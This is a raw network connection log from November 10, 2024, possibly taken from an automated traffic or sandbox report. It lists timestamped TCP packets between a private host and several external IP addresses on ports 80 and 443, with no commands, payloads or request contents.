Nov 10, 2024 04:55:23.239933968 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239943981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.239973068 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.239973068 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.240009069 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.240020037 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.240030050 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.240034103 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.240072966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.240072966 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.240081072 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.240093946 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.240104914 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.240149021 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.240149021 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.241337061 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.242021084 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.242028952 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.242058039 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.242086887 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.242089987 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.242119074 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.242139101 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.243621111 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.243640900 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.243669987 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.243674994 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.243719101 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.256767988 CET	49817	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.257265091 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.257508993 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.257570982 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.262201071 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.267957926 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.267978907 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.268171072 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.268177986 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.268240929 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.279966116 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.279980898 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280080080 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280090094 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280103922 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280105114 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280139923 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280155897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280155897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280155897 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280169964 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280191898 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280191898 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280198097 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280215979 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280225039 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280232906 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280244112 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280246019 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280256987 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280267954 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280288935 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280288935 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280303001 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280313969 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280325890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280330896 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280338049 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280352116 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280380011 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280380011 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280405998 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280416012 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280427933 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280445099 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280498028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280498981 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280524969 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280536890 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280541897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280541897 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280550003 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280555964 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280575037 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280642986 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280648947 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280654907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280683041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280690908 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280690908 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280694962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280705929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280715942 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280729055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280738115 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280738115 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280741930 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280755043 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280770063 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280776978 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280796051 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280805111 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280807972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280822992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280837059 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280837059 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280864000 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280879974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280891895 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280899048 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280905962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280921936 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280921936 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280931950 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280945063 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280946970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280946970 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280960083 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280983925 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.280987978 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.280997992 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281008005 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281009912 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281019926 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281039000 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281039000 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281075954 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281102896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281115055 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281119108 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281140089 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281157970 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281169891 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281182051 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281192064 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281225920 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281225920 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281244993 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281261921 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281280041 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281291962 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281316996 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281328917 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281344891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281344891 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281383038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281439066 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281439066 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281456947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281467915 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281476974 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281531096 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281531096 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281542063 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281552076 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281560898 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:23.281591892 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.281790018 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.300051928 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.300060034 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.300508022 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.300510883 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.302117109 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.302117109 CET	49815	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.302138090 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.302146912 CET	443	49815	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.306566954 CET	49824	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.306595087 CET	443	49824	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.306700945 CET	49824	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.307301044 CET	49824	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.307316065 CET	443	49824	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.308396101 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.308396101 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.308406115 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.308419943 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.314256907 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.314403057 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.314464092 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.317765951 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.317775965 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.317799091 CET	49819	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.317804098 CET	443	49819	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.320900917 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.320928097 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.321024895 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.321024895 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.321033001 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.321140051 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.321871996 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.321890116 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.321969032 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.321975946 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.322087049 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.322520018 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.322539091 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.322551966 CET	49825	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.322572947 CET	443	49825	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.322653055 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.322653055 CET	49825	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.322659969 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.322823048 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.323167086 CET	49825	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.323184013 CET	443	49825	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.323458910 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.323474884 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.323563099 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.323569059 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.323668003 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.324373007 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.324393988 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.324482918 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.324489117 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.324511051 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.324518919 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.325330019 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.325366974 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.325458050 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.325465918 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.325531006 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.345359087 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.345532894 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.345748901 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.345748901 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.345860958 CET	49820	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.345870018 CET	443	49820	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.348536015 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.348560095 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.348778009 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.348834991 CET	49826	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.348845959 CET	443	49826	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.351836920 CET	49818	443	192.168.2.5	23.221.22.207
Nov 10, 2024 04:55:23.352282047 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.352298975 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.352406025 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.352413893 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.352530003 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.352854967 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.352871895 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.352936983 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.352941990 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.353132010 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.368866920 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.368885994 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.369091034 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.369357109 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.370935917 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.370944023 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.370995998 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.371030092 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.371032953 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.371129990 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.385620117 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.385644913 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.385725975 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.385739088 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.385766029 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.385833979 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.403966904 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.403989077 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.404086113 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.404086113 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.404100895 CET	443	49811	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:23.404232979 CET	49811	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:23.428451061 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:23.428471088 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:23.428781986 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:23.430304050 CET	49827	443	192.168.2.5	20.189.173.17
Nov 10, 2024 04:55:23.430315018 CET	443	49827	20.189.173.17	192.168.2.5
Nov 10, 2024 04:55:23.430401087 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.430505037 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.431301117 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.431368113 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.431368113 CET	49821	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.431381941 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.431391954 CET	443	49821	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.434411049 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.434439898 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.435152054 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.435241938 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.435328960 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.435489893 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.435925007 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.435945988 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.436031103 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.436031103 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.436041117 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.436440945 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.436464071 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.436511040 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.436538935 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.436538935 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.436547995 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.436636925 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.436636925 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.437340975 CET	49828	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.437344074 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.437350035 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.437356949 CET	443	49828	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.437381983 CET	49822	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.437386990 CET	443	49822	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.440707922 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.440728903 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.440813065 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.440821886 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.440845966 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.441163063 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441184998 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441222906 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.441230059 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441255093 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.441266060 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441281080 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441342115 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.441342115 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.441349983 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441586018 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441606045 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441627979 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.441636086 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.441664934 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.441951036 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.441951036 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:23.441982985 CET	443	49829	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:23.442061901 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442076921 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442136049 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.442142963 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442143917 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.442218065 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442236900 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442291975 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.442291975 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.442300081 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442354918 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442370892 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442394972 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.442405939 CET	443	49809	13.91.96.185	192.168.2.5
Nov 10, 2024 04:55:23.442465067 CET	49809	443	192.168.2.5	13.91.96.185
Nov 10, 2024 04:55:23.443233967 CET	49830	443	192.168.2.5	20.125.209.212
Nov 10, 2024 04:55:23.443236113 CET	49829	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:23.443243980 CET	443	49830	20.125.209.212	192.168.2.5
Nov 10, 2024 04:55:23.443250895 CET	443	49829	13.107.246.45	192.168.2.5
